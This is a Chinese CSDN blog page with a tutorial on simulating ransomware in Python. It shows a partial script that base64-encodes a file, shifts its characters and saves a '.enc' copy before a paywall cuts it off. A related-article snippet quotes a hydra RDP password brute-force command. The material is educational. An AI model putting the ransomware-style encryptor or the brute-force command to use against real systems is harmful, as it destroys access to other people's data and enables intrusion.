【安全脚本】模拟勒索病毒

最新推荐文章于 2024-08-17 01:03:53 发布
最新推荐文章于 2024-08-17 01:03:53 发布
阅读量1.7k 收藏 3
点赞数 1
分类专栏: 安全学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haoaaao/article/details/127098947
版权
本文介绍了如何使用Python进行文件加密,模拟勒索病毒的过程。通过Base64编码和自定义加密算法,将二进制文件转换成加密文本,然后保存为新文件。解密时,通过相反的步骤还原文件。文章强调了数据备份的重要性,以防止类似攻击。
摘要由CSDN通过智能技术生成

0x00 前置

1、将电脑上的重要文件加密,将文件以二进制的方式进行加密处理,导致加密过后的文件,要打开必须要解密,要解密必须要解密程序。

2、传播:系统or程序漏洞、人为疏忽、后门或木马程序。

3、解决:交钱、破解、数据备份

0x01 python模拟原理

1、如何使用python对文件加密

所有文件都可以base64加密,base64是标准字符串,针对字符串进行加密。再保存,此时将无法打开文件。如果解密,将加密后的文件,按字符串进行解密,并重新保存为二进制文件。

 2、过程

(1)对二进制文件进行base64转码并加密保存

(2)定义加密算法并将加密后的字符串保存在文件中

(3)代码

##对二进制文件进行base64转码并加密保存
import base64 ,os

#加密
def encrypt(filepath):
    with open(filepath, mode='rb') as file:
        data = file.read()

    source = base64.b64encode(data).decode()
    print(source)
    #加密算法:大小写字符右移5位
    dest = ''
    for c in source:
        dest+= chr(ord(c)+5)

    #将加密字符串保存在文件中
    with open(filepath + '.enc', mode='w') as file:
最低0.47元/天 解锁文章
haoaaao
关注
专栏目录
[系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向
杨秀璋的专栏
03-06 6492
前文分享了MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒,复现了WannaCry勒索病毒。这篇文章作者将继续分析WannaCry勒索病毒,主要通过IDA和OD逆向分析蠕虫传播部分,详细讲解蠕虫是如何感染传播的。同时,由于作者技术真的菜,只能叙述自己摸索的过程,如果存在错误或不足之处,还望告知。希望这篇基础性文章对您有所帮助~
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
深度分析一款新型Linux勒索病毒
pandazhengzheng的博客
02-08 2756
深度分析一款新型Linux勒索病毒
【Python】勒索病毒模拟
BrosyveryOK的博客
10-18 2573
勒索病毒能将电脑上的一些重要文件进行数据加密,将文件以二进制的形式进行加密处理,导致无法成功打开加密后的文件,要打开必须要解密,要解密必须要解密程序,从而让我们能够进行勒索。​ 勒索病毒的原理不难,简单来说就是对数据的加密,而解密的办法一般只有我们自己知道,接下去就让我们来编写一些简单的勒索病毒吧!​ 勒索病毒更多情况下是.exe的可执行文件,一般情况下都是由编译型语言编写后编译形成。
应急响应:勒索病毒-实战 案例一.【Windows 系统-排查和解密】
最新发布
网络安全领域___专研者.
08-17 1626
勒索病毒是一种恶意软件,它通过加密用户的数据或锁定用户设备,然后要求用户支付赎金以解锁数据或系统。勒索病毒的入侵方式多样,包括网络共享文件、捆绑传播、垃圾邮件、水坑攻击、软件供应链传播、暴力破解、利用已知漏洞攻击和利用高危端口攻击等。
勒索病毒模拟练习
小白的博客
07-05 642
勒索病毒模拟练习
勒索病毒模拟演练与防御方法
qq_27489877的博客
07-27 1101
WannaCry是一种勒索软件,于2017年5月对全球范围内的计算机发起了广泛的攻击。它主要通过永恒之蓝漏洞传播,一旦感染,就会加密计算机上的文件,并要求受害者支付比特币赎金以获取解密密钥。
python模拟勒索病毒
m0_61974571的博客
10-09 4207
【代码】python模拟勒索病毒
预防NSA勒索病毒攻击脚本
天使也掉毛
05-14 6573
预防445端口勒索病毒修复脚本     直接复制下去,创建一个文件,名字随意后缀是.bat,然后双击就可以了。:+添加关键注册表以及停掉并且禁用计算机敏感服务 echo off ::netstat -an echo Yes | reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters /v S
用python制作勒索病毒_python生成的exe被360识别为勒索病毒原因及解决方法
weixin_39565390的博客
11-30 1755
我用python做了两个功能相似的程序,A程序没问题,B程序有问题,被360误杀,对比后发现B程序引用了os库,替换成了别的库实现os库的功能,新的程序不再有问题。罪魁祸首就是使用了os库。很多人学习python,不知道从何学起。很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。很多已经做案例的人,却不知道如何去学习更加高深的知识。那么针对这三类人,...
Python实现简易勒索病毒
wangluoanquan111的博客
04-18 803
此代码若加密单独文件夹下的文件或者加密少量文件效率还可以,但是如果加密整个大的服务器系统可能会导致卡死。我觉得解决办法可以是使用多线程,python中的threading进行多线程加密。同时可能存在当前用户权限不够导致文件无法加密的情况,这个问题目前还没想到解决办法,以后有时间再来研究一下。但此demo加密一些普通文件夹还是没有问题的,主要是了解一下勒索病毒的原理以及一些常用的加密算法。欢迎各路大佬留下评论交流!
网络安全编程之脚本攻防
10-12
网络安全编程之脚本攻防网络安全编程之脚本攻防网络安全编程之脚本攻防
python 遍历目录下所有文件
qq_35699528的博客
12-06 453
def all_path(dirname): result = []#所有的文件 for maindir, subdir, file_name_list in os.walk(dirname): print("1:",maindir) #当前主目录 print("2:",subdir) #当前主目录下的所有目录 print("...
勒索病毒场景模拟及原理
weixin_30402343的博客
03-29 816
一、环境准备 需准备如下环境及工具: 1) 一台攻击虚机(Kali linux),一台靶机(Win7 64位) 3) 永恒之蓝(wannacry)病毒文件 二、环境准备 1.在kali linux下启动msfconsole 通过该应用,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等。 root@kali:~#...
利用python制作简单勒索病毒
kiihuang的博客
03-24 1726
利用python制作简单的加密勒索病毒,使用base64和ascii进行加密和解密
勒索病毒应急演练
shy的博客
01-19 3970
扫描目标机开放端口,发现开启445和3389端口。 测试445端口是否存在永恒之蓝漏洞,发现存在ms17010漏洞,日后再打。 测试3389远程桌面是否存在弱口令,得到账号密码。 hydra -v -f -t 2 -w 2 -l Administrator -P E:\tools\git\Rdpscan\pass.txt rdp://192.168.5.128 利用得到的账号密码远程进行登录,并进行勒索病毒投放。 双击运行病毒,对该台服务器进行文件加密勒索等操作。 攻击者到
使用VackBAS攻击模拟平台对抗勒索病毒
Moyun_vackbot的博客
12-16 868
基于目前整体态势,许多公司在应对勒索病毒威胁时捉襟见肘,特别是针对医疗、能源、制造行业,犯罪分子为了最大化的非法利益,他们不断演进自身的攻击方式,通过有更有针对性的定制化勒索软件,攻击者精确地在网络上找到易受攻击的目标,通过各种自动或手动的渗透方式进行攻击。目前比较有针对性的勒索软件攻击并不依靠随机选择的受害者支付的小额赎金,而是遵循完整杀伤链,从获得对网络的初始访问权开始到最终加密文件来完成最大程度的感染,以获取最高额的勒索赎金。对于使用它的犯罪分子来说,勒索病毒在全球已是一个价值数十亿美元的行业。
勒索病毒应急响应计划
01-16 877
故事发生背景:某市休日爆发大规模勒索病毒感染事件,该病毒利用系统漏洞进行传播,并产生一定的影响。 〇.演练开始前乙方协助做好模拟环境的搭建和部署。 一.演练开始 1.甲方下达开始指令,各负责人到位。 2.甲方启动“安全预警”预案等。(协助甲方开始自查等流程)。 二.启动病毒感染应急预案:(结合APT设备进行分析) 了解攻击发生的时间和现象,大致判断病毒类型...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值